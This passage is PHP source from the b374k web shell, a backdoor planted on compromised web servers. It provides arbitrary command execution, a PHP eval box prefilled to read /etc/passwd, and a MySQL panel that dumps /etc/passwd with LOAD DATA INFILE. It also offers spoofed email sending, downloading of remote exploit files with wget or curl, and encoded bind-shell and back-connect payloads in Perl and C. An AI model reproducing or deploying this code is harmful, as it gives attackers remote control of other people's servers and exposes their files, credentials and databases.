name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$full\\">delete</a> | <a href=\\"?y=$pwd&dl=$full\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && isset($_GET[\'sqlpass\']) && isset($_GET[\'sqlport\'])){ $sqlhost = $_GET[\'sqlhost\']; $sqluser = $_GET[\'sqluser\']; $sqlpass = $_GET[\'sqlpass\']; $sqlport = $_GET[\'sqlport\']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\\"width:99%;padding:4px 10px 0 10px;\\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\\"gaya\\">@</span>".$sqlhost.":".$sqlport; $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\\">[ databases ]</a>"; if(isset($_GET[\'db\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."\\">".htmlspecialchars($_GET[\'db\'])."</a>"; if(isset($_GET[\'table\'])) $msg .= " <span class=\\"gaya\\">-></span> <a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET[\'db\']."&table=".$_GET[\'table\']."\\">".htmlspecialchars($_GET[\'table\'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET[\'db\']) && (!isset($_GET[\'table\'])) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $query = "DROP TABLE IF EXISTS b374k_table;\\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\\nLOAD DATA INFILE \\"/etc/passwd\\"\\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">$query</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET[\'table\']) && (!isset($_GET[\'sqlquery\']))){ $db = $_GET[\'db\']; $table = $_GET[\'table\']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$file\\">delete</a> | <a href=\\"?y=$pwd&dl=$file\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=code\\">code</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } 